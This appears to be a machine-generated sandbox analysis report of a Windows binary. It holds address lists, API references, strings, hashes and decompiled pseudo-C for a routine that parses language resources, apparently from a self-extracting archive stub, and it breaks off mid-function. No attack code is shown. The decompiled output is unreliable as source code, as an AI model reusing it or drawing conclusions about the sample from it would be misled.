0x0027bf8b
0x0027bf8c
0x0027bf8d
0x0027bf8f
0x0027bf8f
0x0027bfa4
0x0027bfa9
0x0027bfb5
0x0027bfb7
0x0027bfc8
0x0027bfd5
0x00000000
0x0027bfb9
0x0027bfc4
0x0027bfc6
0x0027bfda
0x0027bfda
0x0027bfdc
0x0027bfe2
0x0027bfe8
0x0027bff6
0x0027bffb
0x0027bffc
0x0027c004
0x0027c009
0x0027c010
0x0027c016
0x0027c018
0x0027c01e
0x0027c024
0x0027c026
0x0027c02f
0x0027c032
0x0027c034
0x0027c03d
0x0027c040
0x0027c046
0x0027c049
0x0027c052
0x0027c061
0x0027c066
0x0027c06e
0x0027c070
0x0027c071
0x0027c077
0x0027c078
0x0027c07a
0x0027c07f
0x0027c07f
0x00000000
0x0027c06e
0x00000000
0x0027bfc6
0x0027bfb7
0x00000000
0x0027c087
0x0027c08a
0x0027c08c
0x0027c08c
0x00000000
0x00000000
0x0027bab8
0x0027bac0
0x0027bac6
0x0027bac9
0x0027baed
0x0027bacb
0x0027bacb
0x0027bace
0x0027bae1
0x0027bad0
0x0027bad0
0x0027bad2
0x0027bad7
0x0027bad7
0x0027bace
0x00000000
0x00000000
0x0027bb31
0x0027bb32
0x0027bb37
0x0027bb37
0x0027bb37
0x0027bb3a
0x0027bb3f
0x0027bb45
0x0027bb45
0x0027bb4b
0x0027bb51
0x0027bb51
0x00000000
0x00000000
0x0027b52a
0x0027b52c
0x0027b531
0x0027b537
0x0027b53a
0x00000000
0x0027b53c
0x0027b53c
0x00000000
0x0027b53c
0x0027c093
0x0027c093
0x0027c098
0x0027c09c
0x0027c0a0
0x0027c0a7
0x0027c0ae
0x0027c0b1
0x0027c0b6
0x0027c0b9
0x0027c0bc
0x0027c0c6

APIs

__EH_prolog.LIBCMT ref: 0027B4CC

Part of subcall function 0027A156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0027A21E

SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0027ADDF,?,00000000), ref: 0027B601
GetFileAttributesW.KERNEL32(?), ref: 0027B6BB
DeleteFileW.KERNEL32(?), ref: 0027B6C9
SetWindowTextW.USER32(?,?), ref: 0027B812
_wcsrchr.LIBVCRUNTIME ref: 0027B99C
GetDlgItem.USER32(?,00000066), ref: 0027B9D7
SetWindowTextW.USER32(00000000,?), ref: 0027B9E7
SendMessageW.USER32(00000000,00000143,00000000,002A9602), ref: 0027B9FB
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0027BA24

Strings

ProgramFilesDir, xrefs: 0027B8E6
Software\Microsoft\Windows\CurrentVersion, xrefs: 0027B8BB
<br>, xrefs: 0027B775
%s.%d.tmp, xrefs: 0027B6E1

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3676479488-312220925
Opcode ID: b7f59fc2c981822d0bdce75b303e8ced0cd5f47440a96debaed97fcafbd2c0a0
Instruction ID: 4931d736e86e803caa8cc8ece0094772f0d1d30e2a6ff1679652c2f40db59b03
Opcode Fuzzy Hash: b7f59fc2c981822d0bdce75b303e8ced0cd5f47440a96debaed97fcafbd2c0a0
Instruction Fuzzy Hash: 41E14076910119EAEF25EBB0DD85EEE737CAF05350F1080AAF559E7041EB709B948FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0026CFD0, Relevance: 30.3, APIs: 4, Strings: 13, Instructions: 557
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0026CFD0(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				signed int _t318;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t318 = __ecx;
				_t392 = _t391 - 0x6c;
				E0027D870(E002913DF, _t390);
				E0027D940();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = _t318;
				_t390[0x11] = _t196;
				_t390[0x12] = _t387;
				_t197 = E00280BB8(_t318);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E0026FAB1(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E0026B943(_t396, _t390 - 0x1264))) = 0;
					E0026FA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E0026943C(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E00269768(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E0026946E(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0x29d5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E00285030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0026CC62);
						E00285030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E0026CBC7);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E00269B57();
							_t294 = E00269979(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E00269A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E00285460(_t390 - 0x4286 + _t384, 0x29261c, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E00284DA0(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E00285460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E00269A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E00282B53(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E00269979(_t370, _t382, 0x200000);
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E00282B53(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E00270FDE(_t382, _t212, _t330 + 1);
							L00282B4E(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E0026FA56(_t390 - 0xd4, 0x292624, 0x64);
							_push(0x20002);
							_t218 = E00282B53(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E0026CB33(_t387, _t371, _t390, _t218, _t336);
									L00282B4E(_t390[0x1a]);
									L00282B4E(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0x2a0124 =  *((intOrPtr*)(_t387 + 0x28));
										E00285030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E0026CD08);
										E00285030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E0026CD37);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00273393(_t387 + 0x3c, _t371, _t316);
										E00273393(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E0026CB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
											__eflags = _t336;
											goto L98;
										}
										__eflags = _t336 - 0x10000;
										if(_t336 >= 0x10000) {
											goto L52;
										}
										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t235;
										if(_t235 == 0) {
											_push(0x22);
											L93:
											_pop(_t377);
											 *(_t390[0x1b] + _t336 * 2) = _t377;
											_t336 = _t336 + 1;
											_t390[0x1e] = _t336;
											_t383 = _t383 + 1;
											goto L52;
										}
										_t237 = _t235 - 0x3a;
										__eflags = _t237;
										if(_t237 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t238 = _t237 - 0x12;
										__eflags = _t238;
										if(_t238 == 0) {
											_push(0xa);
											goto L93;
										}
										_t239 = _t238 - 4;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t239 != 0;
										if(_t239 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
									__eflags = _t373 - _t390[0x14];
									if(_t373 == _t390[0x14]) {
										L42:
										_t343 = 0x3a;
										__eflags =  *(_t228 + _t383 * 2) - _t343;
										if( *(_t228 + _t383 * 2) != _t343) {
											L71:
											_t390[0x18] = _t228 + _t383 * 2;
											_t244 = E0026F91A( *(_t228 + _t383 * 2) & 0x0000ffff);
											__eflags = _t244;
											if(_t244 == 0) {
												L79:
												_t336 = _t390[0x1e];
												_t228 = _t390[0x1a];
												goto L80;
											}
											E0026FAB1(_t390 - 0x264, _t390[0x18], 0x64);
											_t248 = E00284E1D(_t390 - 0x264, L" \t,");
											_t390[0x18] = _t248;
											__eflags = _t248;
											if(_t248 == 0) {
												goto L79;
											}
											 *_t248 = 0;
											E002711FA(_t390 - 0x264, _t390 - 0x138, 0x64);
											E0026FA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
											E0026FA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
											E0026FA56(_t390, _t390 - 0x70, 0x32);
											_t262 = E00284E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0026CCED);
											_t394 = _t394 + 0x14;
											__eflags = _t262;
											if(_t262 != 0) {
												_t268 =  *_t262 * 0xc;
												__eflags = _t268;
												_t167 = _t268 + 0x29d150; // 0x28b64ee0
												_t390[0x17] =  *_t167;
											}
											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
											__eflags = _t383;
											_t267 = _t390[0x1a];
											_t374 = 0x20;
											while(1) {
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												L77:
												_t174 =  &(_t390[0x15]); // 0x9
												__eflags = _t348 -  *_t174;
												if(_t348 !=  *_t174) {
													L51:
													_t336 = _t390[0x1e];
													goto L52;
												}
												L78:
												_t383 = _t383 + 1;
												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
												__eflags = _t348 - _t374;
												if(_t348 == _t374) {
													goto L78;
												}
												goto L77;
											}
										}
										_t389 = _t390[0x1a];
										_t270 = _t228 | 0xffffffff;
										__eflags = _t270;
										_t390[0x16] = _t270;
										_t390[0xd] = L"STRINGS";
										_t390[0xe] = L"DIALOG";
										_t390[0xf] = L"MENU";
										_t390[0x10] = L"DIRECTION";
										_t390[0x18] = _t316;
										do {
											_t93 = _t316 * 4; // 0x292628
											_t271 = E00282B33( *((intOrPtr*)(_t390 + _t93 + 0x34)));
											_t96 = _t316 * 4; // 0x292628
											_t390[0x18] = _t271;
											_t272 = E00284DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + _t96 + 0x34)), _t271);
											_t394 = _t394 + 0x10;
											_t375 = 0x20;
											__eflags = _t272;
											if(_t272 != 0) {
												L47:
												_t273 = _t390[0x16];
												goto L48;
											}
											_t357 = _t390[0x18] + _t383;
											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
												goto L47;
											}
											_t273 = _t316;
											_t383 = _t357 + 1;
											_t390[0x16] = _t273;
											L48:
											_t316 = _t316 + 1;
											__eflags = _t316 - 4;
										} while (_t316 < 4);
										_t387 = _t390[0x12];
										_t316 = 0;
										__eflags = _t273;
										if(__eflags != 0) {
											_t228 = _t390[0x1a];
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												L60:
												__eflags = _t351 - _t390[0x15];
												if(_t351 != _t390[0x15]) {
													_t376 = _t228 + _t383 * 2;
													_t390[0x18] = _t316;
													_t274 = 0x20;
													_t352 = _t316;
													__eflags =  *_t376 - _t274;
													if( *_t376 <= _t274) {
														L66:
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
														E002711FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
														_t383 = _t383 + _t390[0x18];
														_t279 = _t390[0x16];
														__eflags = _t279 - 3;
														if(_t279 != 3) {
															__eflags = _t279 - 1;
															_t280 = "$%s:";
															if(_t279 != 1) {
																_t280 = "@%s:";
															}
															E0026D9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
															_t394 = _t394 + 0x10;
														} else {
															_t284 = E00282B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t352 - 0x63;
														if(_t352 >= 0x63) {
															break;
														}
														_t287 =  *_t376;
														_t376 = _t376 + 2;
														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
														_t352 = _t352 + 1;
														_t288 = 0x20;
														__eflags =  *_t376 - _t288;
														if( *_t376 > _t288) {
															continue;
														}
														break;
													}
													_t390[0x18] = _t352;
													goto L66;
												}
												L61:
												_t383 = _t383 + 1;
												L59:
												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
												__eflags = _t351 - _t375;
												if(_t351 == _t375) {
													goto L61;
												}
												goto L60;
											}
										}
										E0026FA56(_t390 - 0xd4, 0x292624, 0x64);
										goto L51;
									}
									__eflags = _t373 - _t390[0x13];
									if(_t373 != _t390[0x13]) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t383 - _t390[0x19];
								} while (_t383 < _t390[0x19]);
								_t218 = _t390[0x1b];
								_t371 = _t390[0x17];
								goto L54;
							} else {
								L00282B4E(_t382);
								goto L57;
							}
						}
						_t333 = _t328 >> 1;
						_t390[0x19] = _t333;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00273393(_t387, _t370, _t380);
						E00273393(_t387 + 0x14, _t370, _t380);
						_t380 = _t380 + 1;
						_t399 = _t380 -  *0x29d5f4; // 0x63
					} while (_t399 < 0);
					_t316 = 0;
					goto L7;
				}
			}

0x0026cfd0
0x0026cfd0
0x0026cfd1
0x0026cfd9
0x0026cfe3
0x0026cfed
0x0026cfee
0x0026cfef
0x0026cff2
0x0026cff4
0x0026cff7
0x0026cffa
0x0026d000
0x0026d002
0x0026d005
0x0026d00b
0x0026d047
0x0026d00d
0x0026d015
0x0026d02d
0x0026d037
0x0026d037
0x0026d052
0x0026d057
0x0026d05f
0x0026d062
0x0026d070
0x0026d42d
0x0026d433
0x0026d43e
0x0026d449
0x0026d076
0x0026d076
0x0026d078
0x0026d07e
0x0026d09c
0x0026d0a8
0x0026d0ba
0x0026d0bf
0x0026d0c2
0x0026d0c5
0x0026d0c8
0x0026d0cb
0x0026d0ce
0x0026d0e2
0x0026d0f7
0x0026d0fc
0x0026d0ff
0x0026d101
0x0026d101
0x0026d104
0x0026d109
0x0026d1c8
0x0026d1c8
0x0026d1cb
0x0026d1ce
0x0026d1df
0x0026d1e7
0x0026d1e8
0x0026d1eb
0x0026d1f0
0x00000000
0x00000000
0x0026d1f6
0x0026d1f9
0x00000000
0x00000000
0x00000000
0x0026d1f9
0x00000000
0x0026d10f
0x0026d117
0x0026d142
0x0026d144
0x0026d14d
0x0026d178
0x0026d180
0x0026d1ac
0x0026d1ac
0x0026d1b0
0x00000000
0x00000000
0x0026d1b2
0x00000000
0x0026d18c
0x0026d19c
0x0026d1a1
0x0026d1a6
0x00000000
0x00000000
0x00000000
0x0026d1a6
0x0026d180
0x0026d155
0x0026d15b
0x0026d16c
0x0026d171
0x0026d176
0x0026d1ba
0x00000000
0x0026d1ba
0x0026d176
0x00000000
0x0026d123
0x0026d133
0x0026d138
0x0026d13d
0x0026d1be
0x0026d1be
0x0026d1c1
0x0026d1c3
0x00000000
0x0026d1c3
0x0026d13f
0x00000000
0x0026d13f
0x0026d117
0x0026d10f
0x0026d208
0x0026d20b
0x0026d210
0x0026d21a
0x0026d21c
0x0026d220
0x0026d222
0x00000000
0x00000000
0x0026d239
0x0026d23e
0x0026d241
0x0026d243
0x0026d253
0x0026d254
0x0026d259
0x0026d25d
0x0026d25f
0x00000000
0x00000000
0x0026d265
0x0026d268
0x0026d26b
0x0026d26f
0x0026d275
0x0026d27a
0x0026d27e
0x0026d281
0x0026d284
0x0026d284
0x0026d289
0x0026d28b
0x0026d28d
0x0026d28d
0x0026d293
0x0026d2a3
0x0026d2a8
0x0026d2ad
0x0026d2b2
0x0026d2b6
0x0026d2b8
0x0026d2c6
0x0026d2ca
0x0026d2cc
0x0026d2ce
0x0026d2d1
0x0026d2d4
0x0026d2d6
0x0026d2d9
0x0026d3c1
0x0026d3ca
0x0026d3d2
0x0026d3da
0x0026d3e1
0x0026d3e4
0x0026d3fe
0x0026d40b
0x0026d413
0x0026d425
0x00000000
0x00000000
0x00000000
0x00000000
0x0026d3e6
0x0026d3e6
0x0026d3ea
0x0026d3f3
0x0026d3f8
0x0026d3f9
0x0026d3f9
0x00000000
0x0026d3e6
0x0026d2df
0x0026d2e6
0x0026d2ed
0x0026d2f4
0x0026d2f4
0x0026d2f7
0x0026d2f9
0x0026d5f5
0x0026d5f5
0x0026d5f9
0x0026d5fa
0x0026d5fd
0x00000000
0x00000000
0x0026d603
0x0026d607
0x0026d659
0x0026d65a
0x0026d65d
0x0026d683
0x0026d690
0x0026d695
0x0026d698
0x0026d69a
0x0026d67b
0x0026d67b
0x00000000
0x0026d67b
0x0026d661
0x0026d662
0x0026d665
0x00000000
0x00000000
0x0026d667
0x0026d667
0x0026d66d
0x00000000
0x00000000
0x0026d676
0x0026d67a
0x0026d67a
0x00000000
0x0026d67a
0x0026d609
0x0026d60f
0x00000000
0x00000000
0x0026d619
0x0026d619
0x0026d61c
0x0026d643
0x0026d645
0x0026d648
0x0026d649
0x0026d64d
0x0026d64e
0x0026d651
0x00000000
0x0026d651
0x0026d61e
0x0026d61e
0x0026d621
0x0026d63f
0x00000000
0x0026d63f
0x0026d623
0x0026d623
0x0026d626
0x0026d63b
0x00000000
0x0026d63b
0x0026d628
0x0026d628
0x0026d62b
0x0026d637
0x00000000
0x0026d637
0x0026d62e
0x0026d631
0x00000000
0x00000000
0x0026d633
0x00000000
0x0026d633
0x0026d2ff
0x0026d304
0x0026d308
0x0026d314
0x0026d316
0x0026d317
0x0026d31b
0x0026d508
0x0026d50b
0x0026d512
0x0026d517
0x0026d519
0x0026d5ef
0x0026d5ef
0x0026d5f2
0x00000000
0x0026d5f2
0x0026d52b
0x0026d53c
0x0026d541
0x0026d546
0x0026d548
0x00000000
0x00000000
0x0026d550
0x0026d563
0x0026d575
0x0026d587
0x0026d596
0x0026d5ab
0x0026d5b0
0x0026d5b3
0x0026d5b5
0x0026d5b7
0x0026d5b7
0x0026d5ba
0x0026d5c0
0x0026d5c0
0x0026d5d3
0x0026d5d3
0x0026d5d5
0x0026d5d8
0x0026d5d9
0x0026d5d9
0x0026d5dd
0x0026d5e0
0x00000000
0x00000000
0x0026d5e2
0x0026d5e2
0x0026d5e2
0x0026d5e6
0x0026d3af
0x0026d3af
0x00000000
0x0026d3af
0x0026d5ec
0x0026d5ec
0x0026d5d9
0x0026d5dd
0x0026d5e0
0x00000000
0x00000000
0x00000000
0x0026d5e0
0x0026d5d9
0x0026d321
0x0026d324
0x0026d324
0x0026d327
0x0026d32a
0x0026d331
0x0026d338
0x0026d33f
0x0026d346
0x0026d349
0x0026d349
0x0026d34d
0x0026d353
0x0026d35a
0x0026d361
0x0026d366
0x0026d36b
0x0026d36c
0x0026d36e
0x0026d386
0x0026d386
0x00000000
0x0026d386
0x0026d373
0x0026d375
0x0026d37a
0x00000000
0x00000000
0x0026d37c
0x0026d37e
0x0026d381
0x0026d389
0x0026d389
0x0026d38a
0x0026d38a
0x0026d38f
0x0026d392
0x0026d394
0x0026d396
0x0026d44c
0x0026d44f
0x00000000
0x00000000
0x00000000
0x00000000
0x0026d455
0x0026d455
0x0026d455
0x0026d459
0x0026d45c
0x00000000
0x00000000
0x0026d45e
0x0026d45e
0x0026d462
0x0026d467
0x0026d46a
0x0026d46f
0x0026d470
0x0026d472
0x0026d475
0x0026d496
0x0026d498
0x0026d4ad
0x0026d4b2
0x0026d4b5
0x0026d4b8
0x0026d4bb
0x0026d4de
0x0026d4e1
0x0026d4e6
0x0026d4e8
0x0026d4e8
0x0026d4fb
0x0026d500
0x0026d4bd
0x0026d4c9
0x0026d4d1
0x0026d4d6
0x0026d4d6
0x00000000
0x00000000
0x00000000
0x00000000
0x0026d477
0x0026d477
0x0026d477
0x0026d47a
0x00000000
0x00000000
0x0026d47c
0x0026d47f
0x0026d482
0x0026d48a
0x0026d48d
0x0026d48e
0x0026d491
0x00000000
0x00000000
0x00000000
0x0026d491
0x0026d493
0x00000000
0x0026d493
0x0026d464
0x0026d464
0x0026d455
0x0026d455
0x0026d459
0x0026d45c
0x00000000
0x00000000
0x00000000
0x0026d45c
0x0026d455
0x0026d3aa
0x00000000
0x0026d3aa
0x0026d30a
0x0026d30e
0x00000000
0x00000000
0x00000000
0x0026d3b2
0x0026d3b2
0x0026d3b2
0x0026d3bb
0x0026d3be
0x00000000
0x0026d2ba
0x0026d2bb
0x00000000
0x0026d2c0
0x0026d2b8
0x0026d245
0x0026d247
0x00000000
0x00000000
0x00000000
0x00000000
0x0026d080
0x0026d080
0x0026d083
0x0026d08c
0x0026d091
0x0026d092
0x0026d092
0x0026d09a
0x00000000
0x0026d09a

APIs

__EH_prolog.LIBCMT ref: 0026CFD9
_wcschr.LIBVCRUNTIME ref: 0026CFFA
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0026D015
__fprintf_l.LIBCMT ref: 0026D4FB

Part of subcall function 00270FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0026B312,00000000,?,?,?,0002032C), ref: 00270FFA

Strings

*messages***, xrefs: 0026D166
H&), xrefs: 0026D338
$%s:, xrefs: 0026D4E1
@%s:, xrefs: 0026D4E8, 0026D4F1
T&), xrefs: 0026D33F
, xrefs: 0026D5E2
8&), xrefs: 0026D331
RTL, xrefs: 0026D4C3
a, xrefs: 0026D182
,, xrefs: 0026D536
R, xrefs: 0026D178
(&), xrefs: 0026D349
*messages***, xrefs: 0026D12D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$(&)$*messages***$*messages***$8&)$@%s:$H&)$R$RTL$T&)$a
API String ID: 4184910265-564348242
Opcode ID: fe5d0933e151c2919b8d6ee4af2c04cc2f62e9f2346049b90f9b6ec5480e6141
Instruction ID: bc0fd34a655df90db32610df25264348af42004d56a302d4ab6ee526a7b43554
Opcode Fuzzy Hash: fe5d0933e151c2919b8d6ee4af2c04cc2f62e9f2346049b90f9b6ec5480e6141
Instruction Fuzzy Hash: D512B071A2030EABDF24EFA4DC85BA937A9EF05304F50016AF90997291EB71D9E5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0027C190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0027C190(intOrPtr _a4, long _a8) {
				char _v67;
				intOrPtr _v72;
				signed int _v84;
				int _v88;
				void* _v92;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HWND__* _t45;
				char _t48;

				E0027A388();
